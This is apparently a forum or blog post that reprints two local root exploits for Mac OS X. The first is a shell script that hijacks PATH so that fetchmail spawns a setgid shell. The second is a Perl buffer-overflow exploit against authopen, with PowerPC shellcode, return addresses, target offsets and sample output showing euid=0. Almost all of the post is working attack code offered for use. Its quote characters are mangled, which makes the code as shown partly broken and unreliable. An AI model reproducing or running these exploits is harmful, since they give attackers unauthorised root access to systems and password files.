OSX: local fetchmail exploit
local fetchmail exploit v1 an v2
#!/bin/sh
#
# Previously undisclosed local fetchmail issue. This takes setgid=6
#
export PATH=/tmp:$PATH
echo /bin/sh -i > /tmp/uname
chmod +x /tmp/uname
/usr/bin/fetchmail -V
v2:
#!/usr/bin/perl
#
# Variant of CF_CHARSET_PATH a local root exploit by v9_at_fakehalo.us
#
# Jill-Does-Computer:/tmp jilldoe$ ./authopen-CF_CHARSET.pl 0
# *** Target: 10.3.7 Build 7T65 on PowerPC, Padding: 1
# sh-2.05b# id
# uid=502(jilldoe) euid=0(root) gid=502(jilldoe) groups=502(jilldoe), 79(appserverusr), 80(admin), 81(appserveradm)
#
#
foreach $key (keys %ENV) {
delete $ENV{$key};
}
#// ppc execve() code by b-r00t + nemo to add seteuid(0)
$sc =
β\x7c\x63\x1a\x79β .
β\x40\x82\xff\xfdβ .
β\x39\x40\x01\xc3β .
β\x38\x0a\xfe\xf4β .
β\x44\xff\xff\x02β .
β\x39\x40\x01\x23β .
β\x38\x0a\xfe\xf4β .
β\x44\xff\xff\x02β .
β\x60\x60\x60\x60β .
β\x7c\xa5\x2a\x79β .
β\x40\x82\xff\xfdβ .
β\x7d\x68\x02\xa6β .
β\x3b\xeb\x01\x70β .
β\x39\x40\x01\x70\x39\x1f\xfe\xcfβ .
β\x7c\xa8\x29\xae\x38\x7f\xfe\xc8β .
β\x90\x61\xff\xf8\x90\xa1\xff\xfcβ .
β\x38\x81\xff\xf8\x38\x0a\xfe\xcbβ .
β\x44\xff\xff\x02\x7c\xa3\x2b\x78β .
β\x38\x0a\xfe\x91\x44\xff\xff\x02β .
β\x2f\x62\x69\x6e\x2f\x73\x68\x58β;
$tgts{β0β} = β10.3.7 Build 7T65 on PowerPC:1β;
$tgts{β1β} = β10.3.7 debug 0x41424344:0β;
unless (($target) = @ARGV) {
print β\n\nUsage: $0
foreach $key (sort(keys %tgts)) {
($a,$b) = split(/\:/,$tgts{β$keyβ});
print β\t$key . $a\nβ;
}
print β\nβ;
exit 1;
}
$ret = pack(βlβ, ($retval));
($a,$b) = split(/\:/,$tgts{β$targetβ});
print β*** Target: $a, Padding: $b\nβ;
# add a wrapper here if you want more than euid=0
open(SUSH,β>/tmp/shβ);
printf SUSH β/bin/csh -i\nβ;
$ENV{βCF_CHARSET_PATHβ} = βAβ x 1048 . pack(βlβ, 0xbffffef6) x 2;
$ENV{βAPPLβ} = β.β x $b . βiiiiβ x 40 . $sc ;
system(β/usr/libexec/authopen /etc/master.passwdβ);
Post a reply
You must be logged in to post a comment.